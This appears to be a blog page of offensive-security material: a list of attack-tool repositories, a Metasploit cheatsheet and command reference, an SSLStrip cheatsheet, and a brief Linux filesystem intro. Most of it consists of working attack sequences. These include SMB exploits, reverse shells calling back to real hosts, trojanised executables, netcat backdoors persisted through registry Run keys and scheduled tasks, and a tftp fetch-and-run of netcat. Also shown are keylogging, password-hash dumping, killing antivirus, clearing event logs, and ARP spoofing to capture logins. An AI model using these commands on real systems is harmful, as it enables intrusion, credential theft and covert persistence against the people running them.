Wednesday, March 30, 2022

Cool GitHub links - tools

 https://github.com/hak5/bashbunny-payloads.git
https://github.com/BloodHoundAD/BloodHound.git
https://github.com/sekirkity/BrowserGather
https://github.com/commixproject/commix.git
https://github.com/byt3bl33d3r/CrackMapExec.git
https://github.com/leebaird/discover.git
https://github.com/iagox86/dnscat2.git
https://github.com/cheetz/Easy-P
https://github.com/EmpireProject/Empire
https://github.com/ChrisTruncer/EyeWitness.git
https://github.com/anshumanbh/git-all-secrets.git
https://github.com/OJ/gobuster.git
https://github.com/GreatSCT/GreatSCT.git
https://github.com/breenmachine/httpscreenshot
https://github.com/cheetz/icmpshock
https://github.com/danielbohannon/Invoke-Obfuscation.git
https://github.com/danielbohannon/Invoke-CradleCrafter.git
https://github.com/peewpw/Invoke-WCMDump.git
https://github.com/nidem/kerberoast.git
https://github.com/guelfoweb/knock.git
https://github.com/robertdavidgraham/masscan.git
https://github.com/blechschmidt/massdns.git
https://github.com/putterpanda/mimikittenz.git
https://github.com/samratashok/nishang.git
https://github.com/codingo/NoSQLMap.git
https://github.com/xorrior/RandomPS-Scripts.git
https://github.com/fireeye/ReelPhish.git
https://github.com/lgandx/Responder.git
https://github.com/leostat/rtfm.git
https://github.com/huntergregal/mimipenguin.git
https://github.com/rebootuser/LinEnum.git
https://github.com/mzet-/linux-exploit-suggester.git
https://github.com/Arno0x/EmbedInHTML
https://github.com/eladshamir/Internal-Monologue
https://github.com/trustedsec/unicorn.git
https://github.com/cheetz/generateJenkinsExploit.git
https://github.com/sensepost/ruler.git
https://github.com/danielmiessler/SecLists.git
https://github.com/mdsecactivebreach/SharpShooter.git
https://github.com/SimplySecurity/SimplyEmail.git
https://github.com/pentestgeek/smbexec.git
https://github.com/trustedsec/social-engineer-toolkit.git
https://github.com/SECFORCE/sparta.git
https://github.com/smicallef/spiderfoot.git
https://github.com/SpiderLabs/Spray.git
https://github.com/TheRook/subbrute.git
https://github.com/aboul3la/Sublist3r.git
https://github.com/anshumanbh/tko-subs.git
https://github.com/epinna/tplmap.git
https://github.com/dxa4481/truffleHog.git
https://github.com/trustedsec/unicorn.git
https://github.com/Veil-Framework/Veil.git
https://github.com/wifiphisher/wifiphisher.git
https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
https://github.com/wpscanteam/wpscan.git
https://github.com/anshumanbh/tko-subs
https://github.com/cyberspacekittens/bloodhound.git
https://github.com/nahamsec/HostileSubBruteforcer.git
https://github.com/JordyZomer/autoSubTakeover.git
https://github.com/vulnersCom/nmap-vulners.git



Monday, March 28, 2022

METASPLOIT CHEATSHEET

 METASPLOIT CHEATSHEET


Commands Only (Not for Script Kiddies):

1Hacking Windows XP with Metasploit tutorial - VNC remote control

use windows/smb/ms08_067_netapi
show optios
set RHOST 192.168.1.1
set payload windows/vncinject/bind_tcp
exploit


2.Metasploit vs Windows 7 and AVG
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOT 192.168.1.10
set LPORT 5555
exploit
ps
migrate 1880
cd c:\ ls
download program-7.exe /root
run killav
shell


3. Hacking By Metasploit . Windows xp Sp3 . With B14CK_B34RD
use windows/smb/ms08_067_netapi
set LHOST 192.168.1.10
set RHOST 192.168.1.1
set payload windows/meterpreter/reverse_tcp
exploit


4.hacking win7 with metasploit
nmap -sS -v -PN 192.168.1-255
use exploit/multi/handler
set LHOST 192.168.1.10
set LPORT 5555
set payload windows/meterpreter/reverse_tcp
show optios
set EndOnSession false
show optios
set RHOST 192.168.1.1
set RPORT 4321
show options
exploit


5. Metasploit --- Explotando vulnerabilidad en Windows 7
sudo nmap 192.168.---cek target dengan nmap------>445/tcp_open microsoft-ds
use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
set RHOST 192.168.1.1
set RPORT 445
run ----run the exploit


6. Metasploit backdooring
msf3#./msfpayloa windows/meterpreter/reverse_tcp LHOST=192.168.1.1 R |./msfconsole -t
exe -x /tmp/kislay.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5
root@b14ck# cd /tmp---->kislay.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
show options
exploit

Meterpretr>
?
getuid
use priv
hashdump
keyscan_start
keyscan_dump
sysinfo
msg * ------->msg displayed on the screen


7. ms10 025 metasploit exploitation
nmap -O 192.168.1.7-----see the target operating system
search ms10
use exploit windows/mmsp/ms10_25_wmss_connect_funnel
set payload windows/shell_bind_tcp
show options
set RHOST 192.168.1.1
exploit


8. IEPeers: ms10_08_ie_behaviors Exploit
search iepeers
use windows/browser/ms10_018_ie_behaviors
set PAYLOAD windows/exec
show options
set SRVHOST 192.168.1.1
set URIPATH /
set CMD calc.exe
set target 1
info---->Available targets ;1 IE 6 spo-sp2 (onclick)
exploit
using url: http://192.168.1.1:8080/
open the browser mozilla or whatever browser used
type: http://192.168.1.1:8080/---enter
wait a few moments...


9. metasploit rpc_dum
nmap -sS 192.168...
135/TCP open
use msrpc_dcom_ms03_026
set payload win32_reverse_meterpreter
show options
set RHOST 192.168.1.1
set LHOST 192.168.1.10
exploit
help
use -m process
execute -f cmd.exe -c
interact 1
c:\winnt\system32\>dir


10.Uploading A Backdoor Metasploit Netcat
meterpreter> upload netcat.exe c:\\WINDOWS\\SYSTEM32\\
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reg setval -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run -v windows live -d "c:\\WINDOWS\\SYSTEM32\\netcat.exe -L -d -p 5555 -e cmd.exe
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reboot
bt~# nc 192.168.1.1 5555


11. BackTrack 4 R1 Metasploit 3 & SET, Hacking Windows 7
cd /pentest/exploits/SET
./set
Enter you choice: 4
enter the ip addres : 192.168.1.1
enter chose ( hit enter for default): 2
enter chose ( hit enter for default):16
set port 4444
open Konqueror /pentest/exploits/SET/
media/sda3---------->msf.exe
cd /pentest/exploits/SET# cd ..
/pentest/exploits# cd framework3
./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168..
set lport 4444
exploit
use priv
help
excecute -f cmd
ipconfig
shell
screenhot
excecute -f explorer


12. ms067 + netcat backdoor
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
exploit
upload /root/nc.exe c:\\WINDOWS\\SYSTEM32\\

MORE Advanced Phun:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript pathto script you want to autorun after exploit is run
set AutoRunScript persistence -r <PublicIP> -p 21 -A -X -i 30

exploit -j -z

____________________________________________________________________

# file_autopwn
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR...s/nga10_02.pdf

./msfconsole

db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf


use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r <PublicIP> -p 21 -A -X -i 30
run

________________________________________________________________________

# shows all the scripts
run [tab]

________________________________________________________________________

# persistence! broken ...if you use DNS name ..
run persistence -r <PublicIP> -p 21 -A -X -i 30

________________________________________________________________________

run get_pidgin_creds

idletime
sysinfo

________________________________________________________________________

# SYSTEM SHELL ( pick a proc that is run by system )
migrate 376
shell

________________________________________________________________________

# session hijack tokens
use incognito
impersonate_token "NT AUTHORITY\\SYSTEM"

________________________________________________________________________

# escalate to system
use priv
getsystem

________________________________________________________________________

execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t

________________________________________________________________________

# list top used apps
run prefetchtool -x 20
________________________________________________________________________
# list installed apps
run prefetchtool -p
________________________________________________________________________
run get_local_subnets
________________________________________________________________________
# find and download files
run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office
________________________________________________________________________
# alternate
download -r "%USERPROFILE%\\desktop" ~/
download -r "%USERPROFILE%\\my documents" ~/
________________________________________________________________________
# alternate to shell not SYSTEM
# execute -f cmd.exe -H -c -i -t
________________________________________________________________________

# does some run wmic commands etc
run winenum
________________________________________________________________________


# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
________________________________________________________________________
# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
________________________________________________________________________
# vnc / port fwd for linux
run vnc
________________________________________________________________________
# priv esc
run kitrap0d

________________________________________________________________________

run getgui
________________________________________________________________________
# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!
run killav

run winemun

run memdump

run screen_unlock
_________________________________________________________________________
upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion \\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion \\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list
reg setval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v system32
upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"

__________________________________________________________________________


getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80"
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666
___________________________________________________________________________
shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787
___________________________________________________________________________
run msf_bind
run msf_bind -p 1975
rev2self
getuid
___________________________________________________________________________
getuid



enumdesktops
grabdesktop

run deploymsf -f framework-3.3-dev.exe

run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254

________________________________________________________________________
# Windows Login Brute Force Meterpreter Script
run winbf -h
________________________________________________________________________
# upload a script or executable and run it
uploadexec

________________________________________________________________________
# Using Payload As A Backdoor from a shell

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe" /ED 11/11/2011

_________________________________________________________________________

# kill AV this will not unload it from mem it needs reboot or kill from memory still ... Darkspy, Seem, Icesword GUI can kill the tasks
catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" dummy
__________________________________________________________________________

email me@ pris@tyrellcorp.net

Metasploit reference commands

 
This is a reference for the most frequently used commands a
nd syntax within Metasploit’s various interfaces

and utilities.

MSFconsole Commands


show exploits

Show all exploits within the Framework.


show payloads
Show all payloads within the Framework.


show auxiliary
Show all auxiliary modules within the Framework.

search name
Search for exploits or modules within the Framework.

info

Load information about a specific exploit or module.

use name

Load an exploit or module (example: use windows/smb/psexec).

LHOST
Your local host’s IP address reachable by the target, often the public IP
address when not on a local network. Typically used for reverse shells.

RHOST
The remote host or the target.

set function
Set a specific value (for example, LHOST or RHOST).

setg function
Set a specific value globally (for example, LHOST or RHOST).

show options
Show the options available for a module or exploit.

show targets
Show the platforms supported by the exploit.

set target num
Specify a specific target index if you know the OS and service pack.

set payload payload
Specify the payload to use.

show advanced
Show advanced options.

set autorunscript migrate -f
Automatically migrate to a separate process upon exploit completion.

check
Determine whether a target is vulnerable to an attack.

exploit
Execute the module or exploit and attack the target.

exploit -j
Run the exploit under the context of the job. (This will run the exploit
in the background.)

exploit -z
Do not interact with the session after successful exploitation.

exploit -e encoder
Specify the payload encoder to use (example: exploit –e shikata_ga_nai).


exploit -h

Display help for the exploit command.

sessions -l
List available sessions (used when handling multiple shells).

sessions -l -v
List all available sessions and show verbose fields, such as which vulnerability
was used when exploiting the system.

sessions -s script
Run a specific Meterpreter script on all Meterpreter live sessions.

sessions -K
Kill all live sessions.

sessions -c cmd
Execute a command on all live Meterpreter sessions.

sessions -u sessionID
Upgrade a normal Win32 shell to a Meterpreter console.

db_create name
Create a database to use with database-driven attacks (example: db_create
autopwn).

db_connect name
Create and connect to a database for driven attacks (example: db_connect
autopwn).

db_nmap
Use nmap and place results in database. (Normal nmap syntax is supported,
such as –sT –v –P0.)

db_autopwn -h
Display help for using db_autopwn.

db_autopwn -p -r -e
Run db_autopwn against all ports found, use a reverse shell, and exploit all
systems.

db_destroy
Delete the current database.
db_destroy user:password@host:port/database
Delete database using advanced options.
 
Meterpreter Commands


help
Open Meterpreter usage help.

run scriptname
Run Meterpreter-based scripts; for a full list check the scripts/meterpreter
directory.

sysinfo
Show the system information on the compromised target.

ls
List the files and folders on the target.


use priv
Load the privilege extension for extended Meterpreter libraries.

ps
Show all running processes and which accounts are associated with each
process.

migrate PID
Migrate to the specific process ID (PID is the target process ID gained
from the ps command).

use incognito
Load incognito functions. (Used for token stealing and impersonation on
a target machine.)

list_tokens -u
List available tokens on the target by user.

list_tokens -g
List available tokens on the target by group.

impersonate_token DOMAIN_NAME\\USERNAME
Impersonate a token available on the target.

steal_token PID
Steal the tokens available for a given process and impersonate that token.

drop_token
Stop impersonating the current token.

getsystem
Attempt to elevate permissions to SYSTEM-level access through multiple
attack vectors.


shell
Drop into an interactive shell with all available tokens.

execute -f cmd.exe -i
Execute cmd.exe and interact with it.

execute -f cmd.exe -i -t
Execute cmd.exe with all available tokens.

execute -f cmd.exe -i -H -t
Execute cmd.exe with all available tokens and make it a hidden process.

rev2self
Revert back to the original user you used to compromise the target.

reg command
Interact, create, delete, query, set, and much more in the target’s registry.

setdesktop number
Switch to a different screen based on who is logged in.

screenshot
Take a screenshot of the target’s screen.

upload file
Upload a file to the target.

download file
Download a file from the target.

keyscan_start
Start sniffing keystrokes on the remote target.

keyscan_dump
Dump the remote keys captured on the target.

keyscan_stop
Stop sniffing keystrokes on the remote target.

getprivs
Get as many privileges as possible on the target.

uictl enable keyboard/mouse
Take control of the keyboard and/or mouse.

background
Run your current Meterpreter shell in the background.

hashdump
Dump all hashes on the target.

use sniffer
Load the sniffer module.

sniffer_interfaces
List the available interfaces on the target.

sniffer_dump interfaceID pcapname
Start sniffing on the remote target.

sniffer_start interfaceID packet-buffer
Start sniffing with a specific range for a packet buffer.

sniffer_stats interfaceID
Grab statistical information from the interface you are sniffing.

sniffer_stop interfaceID
Stop the sniffer.

add_user username password -h ip
Add a user on the remote target.

add_group_user "Domain Admins" username -h ip
Add a username to the Domain Administrators group on the remote target.

clearev
Clear the event log on the target machine.

timestomp
Change file attributes, such as creation date (antiforensics measure).

reboot
Reboot the target machine.


MSFpayload Commands

 msfpayload -h
List available payloads.

 msfpayload windows/meterpreter/bind_tcp O
List available options for the windows/meterpreter/bind_tcp payload (all of
these can use any payload).



msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X
payload.exe

Create a Meterpreter reverse_tcp payload to connect back to 192.168.1.5
and on port 443, and then save it as a Windows Portable Executable
named payload.exe.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R >

payload.raw

Same as above, but export as raw format. This will be used later in



msfencode.

msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
Same as above but export as C-formatted shellcode.


msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
Export as %u encoded JavaScript.


MSFencode Commands


msfencode -h
Display the msfencode help.


msfencode -l
List the available encoders.


msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs,
loop-vbs, asp, war, macho)
Format to display the encoded buffer.


msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5
-t exe
Encode payload.raw with shikata_ga_nai five times and export it to an
output file named encoded_payload.exe.


msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/
_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o
multi-encoded_payload.exe
Create a multi-encoded payload.


msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
Create pure alphanumeric shellcode where ESI points to the shellcode;
output in C-style notation.


MSFcli Commands

msfcli | grep exploit
Show only exploits.

msfcli | grep exploit/windows
Show only Windows exploits.

msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp
LPORT=443 RHOST=172.16.32.142 E

Launch ms08_067_netapi exploit at 172.16.32.142 with a bind_tcp payload
being delivered to listen on port 443.


Meterpreter Post Exploitation Commands

http://pastebin.com/VmTtcz0A

Sporked from http://metasploited.blogspot.com/2011/08/metasploit-penetration-testers-guide.html

email us
PLUG-security@lists.plug.phoenix.az.us
pris@tyrellcorp.net

SSLStrip CHEATSHEET

 <HTML>
<PRE>

Just Like Farengi - We Like to BE PREPARED:

# SSLStrip CHEATSHEET

OVERVIEW:

Requirements

    * Python >= 2.4 (apt-get install python)
    * The python "twisted-web" module (apt-get install twisted-web)

Setup

    * tar zxvf sslstrip-0.5.tar.gz
    * cd sslstrip-0.5
    * (optional) sudo python ./setup.py install

Running sslstrip

    * Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
    * Setup iptables to redirect HTTP traffic to sslstrip.
(iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)
    * Run sslstrip. (sslstrip.py -l <listenPort>)
    * Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)

Thanks to Moxie MarlinSpike

https://www.blackhat.com/html/bh-dc-09/bh-dc-09-speakers.html#Marlinspike

STEP X STEP (for those who need it slower):

# Proxy Preparation

    * First verify routing and nat;

    # cat /proc/sys/net/ipv4/ip_forward

    * 0

    # echo 1 > /proc/sys/net/ipv4/ip_forward

    # cat /proc/sys/net/ipv4/ip_forward

    * 1

    # /sbin/iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

# Start MITM

    * Arpspoof addresses to default interface gateway (and target machine)

     # arpspoof -i eth0 -t 192.168.1.231 192.168.1.244

# SSL Strip

    * Start SSLStrip:

    # ./sslstrip -l 8080

* Open Browser  -  Go Login to SSL https://Gmail.com (for instance)

# tail -f sslstrip.log

You will log the name:password pairs for each site visited from the proxy.

As you can see, the default gateway and target machine can be seasoned to taste.

./sslstrip -h

------------------------------------end SHEETCHEAT
</html>
</pre>

Sunday, March 27, 2022

Linux - Week 1 Getting Started, The Shell & Basic File Management

Linux adheres to the filesystem hierarchy standard (FHS),35which provides a familiar and universal layout for all Linux users. The directories you will find most useful are:

•/bin-basic programs (ls, cd, cat, etc.)
•/sbin-system programs (fdisk, mkfs, sysctl, etc)
•/etc-configuration files
•/tmp-temporary files (typically deleted on boot)
•/usr/bin-applications (apt, ncat, nmap, etc.)
•/usr/share-application support and data files

There are many other directories, most of which you will rarely need to enter, but having a good familiarity of the layout of the Linux filesystem will help your efficiency immensely